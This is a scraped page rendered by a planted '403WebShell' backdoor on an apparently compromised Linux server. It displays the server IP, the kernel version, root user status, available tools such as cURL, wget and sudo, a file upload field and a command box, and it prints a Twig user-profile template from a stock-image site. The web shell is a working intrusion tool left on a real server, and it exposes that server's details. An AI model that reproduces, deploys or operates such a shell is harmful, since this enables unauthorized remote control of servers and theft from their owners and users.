WordPress

Briefly unavailable for scheduled maintenance.
Check back in a some hours.
403WebShell
403Webshell
Server IP : 38.242.244.58  /  Your IP : 216.73.216.32
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1486879.contaboserver.net 5.4.0-166-generic #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.19
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/sura/src/Resources/FOSUserBundle/views/Profile/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/sura/src/Resources/FOSUserBundle/views/Profile/show_content.html.twig
{% trans_default_domain 'FOSUserBundle' %}

<div class="page_excerpt">
    <h2 class="sr_heading_title">My Account Profile</h2>
{#    <p class="sr_heading_intro">Lorem ipsum is placeholder text commonly used in the graphic.</p>#}
</div>

<div class="row sector_profile">
    <div class="col-lg-8">
        <div class="card mb-3">
            <div class="card-header">
                <div class="card-header-title">User details</div>
                <a class="btn creat_new" href="{{ path('fos_user_profile_edit') }}">
                    <span class="button_primary_label">Edit</span>
                </a>
            </div>
            <div class="datagrid no_btn_p">
                <table>
                    <tbody>
                        <tr>
                            <td class="table_head">Profile Picture</td>
                            <td>
                                <img src="{{ helper.avatarIsUrl(app.user.avatar) ? app.user.avatar : asset(app.user.getAvatarUrl()) }}" alt="" class="user_avatar">
                            </td>
                        </tr>

                        <tr>
                            <td class="table_head">Name</td>
                            <td>{{ user.FirstName}} {{ user.LastName}}</td>
                        </tr>

                        <tr>
                            <td class="table_head">User Name</td>
                            <td>{{ user.username }}</td>
                        </tr>

                        <tr>
                            <td class="table_head">Password</td>
                            <td>*********</td>
                        </tr>

                        <tr>
                            <td class="table_head">Email</td>
                            <td>{{ user.email }}</td>
                        </tr>
                        <tr>
                            <td class="table_head">Phone</td>
                            <td>{{ user.phoneNumber ? user.phoneNumber: 'Not set' }}</td>
                        </tr>

                        {% if is_granted('ROLE_CONTRIBUTOR') %}

                        <tr>
                            <td class="table_head">Date Joined</td>
                            {% if user.joinedOn is defined and user.joinedOn is not null %}
                                <td>{{ user.joinedOn.format("d F Y, h:i:s ") }}</td>
                                {% else %}
                                    <td>28<sup>th</sup> December, 2015</td>
                            {% endif %}
                        </tr>
                    {% endif %}


                    </tbody>
                </table>
            </div>
        </div>

        {# @var user \App\Entity\User #}
        {% set user = app.user %}
        {% set subscriptions = user.emailSubscriptions %}



        {% if is_granted("ROLE_CONTRIBUTOR") %}
        <div class="card mb-3">
            <div class="card-header">
                <div class="card-header-title">Email Preferences</div>
            </div>
                <div class="datagrid no_btn_p">
                    <form method="post" action="{{ path('edit_subscription') }}">
                        <table>
                            <tbody>
                            <tr>
                                <td>
                                    What types of communication would you like to receive from Sura Images?
                                </td>
                            </tr>

                            {# @var subscription \App\Entity\EmailSubscription #}
                            {% for subscription in subscriptions %}
                                <tr>
                                    <td>
                                        <label class="container" for="{{ subscription.id }}">
                                            {{ subscription.emailCategory.category|capitalize }}
                                            <input type="checkbox" name="{{ subscription.id }}" id="{{ subscription.id }}" {% if subscription.status %}checked{% endif %}>
                                            <span class="checkmark"></span>
                                        </label>
                                    </td>
                                </tr>
                            {% endfor %}


                            <tr>
                                <td><input type="submit" class="submit_btn width_auto" value="Save"></td>
                            </tr>

                            </tbody>
                        </table>
                    </form>
                </div>
        </div>
        {% endif %}



    </div>
    <div class="col-xl-3">
        <div class="payment_instruction">
            {% if is_granted('ROLE_CONTRIBUTOR') %}
                <h4>What you need to know</h4>
                <ul>
                    <li>You get 60% commission on each sale.</li>
                    <li>
                        {{ app.user.isexclusive
                        ? "You have an exclusive contract with Sura Images"
                        : "You have a non-exclusive contract but should you prefer exclusive contract contact us for further details"
                        }}
                    </li>
                    <li>You retain all the copyright</li>
                    <li>You get access to your account statement</li>
                    <li>Please Check: <a href="{{ path('static_conterms') }}" target="_blank">Contributor Agreement</a></li>
                </ul>


            {% elseif(is_granted('ROLE_MODEL')) %}
                <h4>What you need to know</h4>
                <p>As a modern day model there are many ways to make an extra coin and one of them is to create content viable for commercial use; be it photos or video footage.</p>
                <p>The best approach is to collaborate with a photographer or videographer to create content together and Sura Images as a platform has considered that partnership by building a platform where both parties can work together without having trust issues.</p>
                <p>A Sura Images model account gives you access to:</p>
                <ul>
                    <li>Keep a track of your earnings</li>
                    <li>Know how much each of your photographer/videographer owes you</li>
                    <li>Know which of your release forms (MRF) has been assigned to what number of stock</li>
                </ul>

            {% endif %}

        </div>
    </div>
</div>


Youez - 2016 - github.com/yon3zu
LinuXploit